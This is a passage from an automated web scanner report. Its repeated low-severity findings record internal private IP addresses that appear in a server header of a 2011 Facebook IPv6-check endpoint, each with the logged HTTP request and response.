Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.137.44.125
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:48 GMT

/*1308244188,176761981*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.249. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.108.108

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110d92d54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43418837&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.108.108
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:10 GMT

/*1308223510,169569388*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.250. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.173.54

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.173.54
X-Cnection: close
Date: Thu, 16 Jun 2011 12:25:28 GMT

/*1308227128,171355446*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.251. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.122.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.122.51
X-Cnection: close
Date: Thu, 16 Jun 2011 19:19:19 GMT

/*1308251959,171342387*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.252. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.87.23

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a6f47958%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.87.23
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:38 GMT

/*1308245738,171333399*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.253. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.254.49

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.254.49
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:49 GMT

/*1308240769,171900465*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.254. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.233.49

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.233.49
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:40 GMT

/*1308231160,171895089*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.255. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.81.52

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.81.52
X-Cnection: close
Date: Thu, 16 Jun 2011 16:43:52 GMT

/*1308242632,171331892*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.256. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.37.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.37.31
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:05 GMT

/*1308246665,171910431*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.257. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.108.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.108.45
X-Cnection: close
Date: Thu, 16 Jun 2011 17:56:15 GMT

/*1308246975,171863085*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.258. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.104.107

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.104.107
X-Cnection: close
Date: Thu, 16 Jun 2011 16:02:30 GMT

/*1308240150,176711787*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.259. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.167.46

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.167.46
X-Cnection: close
Date: Thu, 16 Jun 2011 12:09:55 GMT

/*1308226195,171353902*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.260. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.106.32

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.106.32
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:40 GMT

/*1308240460,171338272*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.261. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.200.110

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13f69d6fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff395dfe8a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.36.200.110
X-Cnection: close
Date: Thu, 16 Jun 2011 14:39:53 GMT

/*1308235193,170182766*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.262. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.79.107

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.79.107
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:31 GMT

/*1308230851,176705387*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.263. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.124.32

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13acfec3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.124.32
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:26 GMT

/*1308230546,171342880*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.264. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.219.51

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3871537c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.219.51
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:04 GMT

/*1308242944,171891507*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.265. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.64.132

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfedd4a6bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.64.132
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:35 GMT

/*1308230855,176701572*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.266. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.82.42

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.82.42
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:39 GMT

/*1308234879,171332138*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.267. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.32

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.132.32
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:29 GMT

/*1308234569,171344928*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.268. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.245.53

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df15d47b8d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.245.53
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:10 GMT

/*1308244810,171373877*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.269. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.120.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.120.45
X-Cnection: close
Date: Thu, 16 Jun 2011 16:33:32 GMT

/*1308242012,171866157*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.270. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.113.34

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc1657c04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.113.34
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:24 GMT

/*1308239844,171340066*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.271. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.78.33

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.78.33
X-Cnection: close
Date: Thu, 16 Jun 2011 14:44:59 GMT

/*1308235499,171331105*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.272. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.206.62

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dad6e6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff367d4868%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.206.62
X-Cnection: close
Date: Thu, 16 Jun 2011 16:59:22 GMT

/*1308243562,171363902*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.273. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.206.31

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1587192ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.206.31
X-Cnection: close
